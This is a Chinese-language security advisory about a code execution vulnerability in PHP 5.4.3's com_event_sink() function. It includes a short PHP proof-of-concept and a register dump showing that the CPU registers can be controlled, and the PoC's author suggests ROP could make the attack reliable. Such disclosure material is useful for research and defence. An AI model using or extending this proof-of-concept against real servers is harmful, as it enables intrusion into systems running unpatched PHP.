PHP 5.4.3 'com_event_sink()' 远程代码执行漏洞
PHP 5.4.3 'com_event_sink()' 远程代码执行漏洞
发布时间: 2012-05-11漏洞版本:
PHP 5.4.3
漏洞描述:
BUGTRAQ ID: 53642 PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。 PHP 5.4.3中的函数com_event_sink()在实现时存在远程漏洞,可被远程攻击者利用在受影响的网络服务器中执行任意代码。<* 参考
http://isc.sans.edu/diary.html?storyid=13255*>
测试方法:
@Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- <?php
- /*
- PHP <= 5.4.3 (com_event_sink) Code Execution Proof of Concept
- Found by condis
- Website: http://cond.psychodela.pl
- Tested on:
- PHP 5.3.8 + Windows XP SP3 Professional PL
- PHP 5.3.10 + Windows XP SP3 Professional PL
- PHP 5.4.0 + Windows XP SP3 Professional PL
- PHP 5.4.3 + Windows XP SP3 Professional PL
- Description:
- This is a very strange bug and I had a really hard time trying to classify
- it, but lets start from the beginning.
- As we can read in PHP manual : com_event_sink function connects events from
- COM object to a PHP object. First argument should be a COM object. But when
- I set it up to new Variant(), PHP instance crashed.
- After few minutes of research it was clear to me that we can control EAX
- register by defining first parameter of our Variant object.
- The proof of concept code located below should produce situation similar to
- this :
- eax=024e0050 ebx=010328f0 ecx=41414141 edx=00c0facc esi=0121ff68 edi=00000000
- eip=100f33d5 esp=00c0faa8 ebp=00000000 iopl=0 nv up ei pl nz na po nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
- 100f33d4 50 push eax
- 100f33d5 8b01 mov eax,dword ptr [ecx] ds:0023:41414141=????????
- 100f33d7 ffd0 call eax
- IMHO it is possible to write a reliable exploit using i.e.: ROP method but due
- to lack of free time and skill I leave this task to someone else. Also 0in tried
- to write stable exploit for same bug in com_print_typeinfo() function but as far
- as I know it isn't stable enough :(
- Greetz: cxib, 0in, and others ;>
- */
- $EAX = 0x024E0050; // stack starts at 0x024E0050 (in my case)
- $stack = str_repeat("x41", 0x1000000); // putting some garbage on the stack so the ECX would be 41414141
- class foo { }
- com_event_sink(new Variant($EAX), new foo(), array());
- ?>
安全建议:
厂商补丁: PHP --- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.php.net
评论暂时关闭